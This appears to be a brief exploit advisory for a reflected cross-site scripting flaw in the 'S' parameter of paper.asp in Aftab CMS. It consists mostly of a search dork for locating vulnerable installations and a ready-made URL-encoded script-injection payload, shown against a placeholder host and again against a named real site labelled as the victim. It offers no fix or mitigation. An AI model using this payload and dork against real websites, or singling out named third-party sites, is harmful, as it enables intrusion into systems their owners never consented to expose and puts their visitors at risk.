######################################################### --------------------------------------------------------- Portal Name: Aftab Cms Vendor : http://www.aftabsoft.com Vulnerable File : paper.asp Dork: Powered by: Aftabsoft Co. Author : Pouya_Server , Pouya.s3rver@Gmail.com Vulnerability : XSS (Cross site scripting) --------------------------------------------------------- ######################################################### http://www.site.com/paper.asp?S=%3Cscript%3Edocument.write%28%22%3Cmarquee%3E%3Cfont+size%3D20%3EPouya_server%3C%2Fmarquee%3E%22%29%2Calert%28%22Pouya_server%22%29%3C%2Fscript%3E&I3.x=34&I3.y=8 --------------------------------- Victem : http://atiye.ir/paper.asp?S=%3Cscript%3Edocument.write%28%22%3Cmarquee%3E%3Cfont+size%3D20%3EPouya_server%3C%2Fmarquee%3E%22%29%2Calert%28%22Pouya_server%22%29%3C%2Fscript%3E&I3.x=34&I3.y=8